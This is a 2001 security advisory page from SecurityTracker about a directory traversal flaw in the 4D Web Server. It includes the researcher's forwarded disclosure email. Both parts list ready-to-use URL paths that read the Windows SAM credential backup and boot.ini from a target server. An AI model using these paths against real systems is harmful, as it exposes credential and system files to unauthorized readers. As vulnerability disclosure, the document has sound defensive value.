SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Web Server/CGI)  >   4D Web Server Vendors:   4D, Inc.
4D Web Server Discloses All Files on the Drive to Remote Users
SecurityTracker Alert ID:  1002232
SecurityTracker URL:  http://securitytracker.com/id/1002232
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Aug 22 2001
Impact:   Disclosure of system information, Disclosure of user information
Exploit Included:  Yes  
Version(s): 6.57; possibly others
Description:   A directory traversal vulnerability was reported in 4D's web server, allowing remote users to view any file on the drive that the server is installed on.

A remote user can request the following type of URLs (preceeded by 'http://[targethost]') to trigger the vulnerability:

/4DBin/_/C:/winnt/repair/sam._
/4DBin/_/../winnt/repair/sam._
/4DBin/_/C:/inetpub/../boot.ini
/4DBin/_/../boot.ini
/4DBin/_/../inetpub/../boot.ini

The vendor has reportedly been notified.

Impact:   A remote user can view any file on the system that is located on the same drive as the web server.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.4d.com/ (Links to External Site)
Cause:   Input validation error
Underlying OS:  Apple (Legacy "classic" Mac), Windows (NT)
Underlying OS Comments:  Tested on Windows NT; not tested on MacOS

Message History:   None.


 Source Message Contents

Subject:  ACI 4D WebServer Directory traversal.



----- Forwarded by Kevin R Finisterre/OH/CheckFree on 08/20/2001 10:43 AM
-----
                                                                                                                                
                    KF <dotslash@snosoft.com>                                                                                   
                    Sent by:                          To:     sales@4D.com, recon@snosoft.com                                   
                    elguapo@clmboh1-smtp3.colum       cc:                                                                       
                    bus.rr.com                        Subject:     I have found a security hole in your product...              
                                                                                                                                
                                                                                                                                
                    08/18/2001 09:39 PM                                                                                         
                                                                                                                                
                                                                                                                                




vendor: http://www.4d.com/
current version: 6.7
tested version: 6.57 , others?

This directory transversal hole seems to work on
ACI 4d webserver running on the NT platform. I would imagine
exploitation on a macos box would be similar but would require
the proper mac filesystem path to the file you wish to view.

Server: ACI-4D/6.57

Http://host + one of the following urls.

/4DBin/_/C:/winnt/repair/sam._
/4DBin/_/../winnt/repair/sam._
/4DBin/_/C:/inetpub/../boot.ini
/4DBin/_/../boot.ini
/4DBin/_/../inetpub/../boot.ini

-KF





 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC